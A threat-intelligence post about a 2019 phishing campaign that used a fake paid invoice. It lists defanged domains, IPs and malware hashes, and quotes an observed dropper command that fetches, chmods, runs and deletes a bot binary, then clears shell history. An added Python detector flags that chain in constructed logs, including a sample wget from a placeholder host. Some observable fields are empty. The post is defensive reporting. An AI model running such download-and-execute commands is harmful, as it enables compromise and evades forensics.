The “Mill Taste” Campaign


October 28, 2019

An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: “Mill Taste”) and shows a close-up of a sweet potato or yam on the landing page of the website. The social engineering approach is an email from an “Accounting Manager” by the name of “Melissa Henry” who is sending a “copy” of a paid invoice. In fact, the message carries a PDF attachment and arrives with the subject line: Paid Invoice TT Copy. Based on my link analysis the PDF is infected with malware, which is described below.

Phishing Campaign Cyber Observables

The phishing domain is:  elmolinosabor[.]com

The phishing IP is:  146.112.61[.]107

Recent DNS History

The threat actor appears to have begun building his infrastructure on February 1, 2019 using an admin panel labeled “” at IP:  From the DNS history tracked by [redacted] it appears that the initial test run of the malicious infrastructure was on June 5th and 8th from www1-royalbank[.]cc and www1royalbank-petrocanada[.]com, respectively.

The splash page for all three of these events shows the same ‘Welcome!’ placeholder.

According to the [redacted] tool, the autonomous system for the above-noted IP is AS202425, which is exhibiting multiple security issues including:

  • Route leaks (4)
  • Hijacks (111)
  • DDoS Amplifiers (326)
  • Static Loops (5)

Malware Artifacts

The most recently seen malware artifact as documented on [redacted] was the following WIN32 executable: scaalqtw[.]exe (Hash: 533a8297086b4d014c1c65fcfccfdaf906890016f08d430ed0e1ebb3a4957fe9). As of August 15, 2019, 51 of 70 antivirus research firms have identified this malware as malicious, including CheckPoint, CrowdStrike, FireEye, F-Secure, Kaspersky, Malwarebytes, McAfee, Microsoft, Panda, Palo Alto Networks, Sophos, TrendMicro, and Symantec. It is being characterized as a “heuristic” “downloader” and a “Grandcrab.AF” Trojan.

As the viewer can see from the above screenshot, the executable beacons out to a Seychelles site and to a .zz site (the question mark [?]) shown on the node graph representation. There are numerous “communicating” and referring nodes also associated with the .zz node, which [redacted] identifies as Hanover Hospital. The Cyber Observables for this campaign are given below.

Contact CTIN for more information and the complete list of Cyber Observables of the Mill Taste Campaign.

Dropper Site Cyber Observables


Communicating Nodes Cyber Observables

Hash (SHA-256): 7fe7a59e34d6c190309219d69fe11900daec7d82e0f6de36716d5068806fc814
Observed command: /tmp; wget; chmod 777 ECHOBOT.x86; ./ECHOBOT.x86; rm -rf ECHOBOT.x86; history -c
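As an added example (not part of CTIN's report), the following Python snippet checks constructed log lines against the observables quoted above and flags the fetch, chmod, execute, delete, clear-history chain recorded in the communicating-node row; the log lines, their field names and the dropper host address are assumptions made for this example.

```python
import re

# Observables quoted in the report above (defanging brackets stripped for matching).
IOCS = {
    "domain": "elmolinosabor.com",
    "ip": "146.112.61.107",
    "sha256": {
        "533a8297086b4d014c1c65fcfccfdaf906890016f08d430ed0e1ebb3a4957fe9",
        "7fe7a59e34d6c190309219d69fe11900daec7d82e0f6de36716d5068806fc814",
    },
}

# Dropper-chain stages from the communicating-node row: fetch, chmod, run, delete, clear history.
CHAIN_STAGES = [
    ("fetch", re.compile(r"\b(wget|curl)\b")),
    ("chmod", re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b")),
    ("exec", re.compile(r"(^|;\s*)\./\S+")),
    ("cleanup", re.compile(r"\brm\s+-rf?\s+\S+")),
    ("antiforensics", re.compile(r"\bhistory\s+-c\b")),
]

# Constructed log lines for this example; the dropper host is a TEST-NET placeholder.
SAMPLE_LOGS = [
    "2019-10-28T09:12:01 proxy user=jdoe url=http://elmolinosabor[.]com/invoice.pdf status=200",
    "2019-10-28T09:13:44 av detect sha256=533a8297086b4d014c1c65fcfccfdaf906890016f08d430ed0e1ebb3a4957fe9 file=scaalqtw.exe",
    "2019-10-28T09:15:10 auditd cmd='cd /tmp; wget http://198.51.100.7/ECHOBOT.x86; chmod 777 ECHOBOT.x86; ./ECHOBOT.x86; rm -rf ECHOBOT.x86; history -c'",
    "2019-10-28T09:16:02 auditd cmd='wget https://example.org/release.tar.gz; tar xzf release.tar.gz'",
]

def ioc_hits(line):
    """Return which report observables (domain, ip, sha256) appear in a log line."""
    plain = line.replace("[.]", ".").lower()
    hits = [k for k in ("domain", "ip") if IOCS[k] in plain]
    if any(h in plain for h in IOCS["sha256"]):
        hits.append("sha256")
    return hits

def chain_stages(line):
    """Return the dropper-chain stages present in one log line, in chain order."""
    return [name for name, rx in CHAIN_STAGES if rx.search(line)]

def triage(log_lines, min_stages=3):
    """Flag IoC matches first, then any line showing at least min_stages chain stages."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        hits, stages = ioc_hits(line), chain_stages(line)
        if hits:
            findings.append((n, "ioc", hits))
        elif len(stages) >= min_stages:
            findings.append((n, "dropper-chain", stages))
    return findings
```

A lone wget (line 4 of the sample) is not flagged; only the combination of stages, or a direct observable match, produces a finding.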

RJG CTIN President & Co-Founder
Jane Ginn. As the co-founder of the Cyber Threat Intelligence Network (CTIN), a consultancy with partners in Europe, Ms. Ginn has been pivotal in the development of the STIX international standard for modeling and sharing threat intelligence. She currently serves as the Secretary of the OASIS Threat Actor Context Technical Committee, contributing to the creation of a semantic technology ontology for cyber threat actor analysis. Her efforts in this area and her earlier work with the Cyber Threat Intelligence (CTI) TC earned her the 2020 Distinguished Contributor award from OASIS. In public service, she advised five Secretaries of the US Department of Commerce on international trade issues from 1994 to 2001 and served on the Washington District Export Council for five years. In the EU, she was an appointed member of the European Union's ENISA Threat Landscape Stakeholders' Group for four years. A world traveler and amateur photojournalist, she has visited over 50 countries, further enriching her global outlook and professional insights.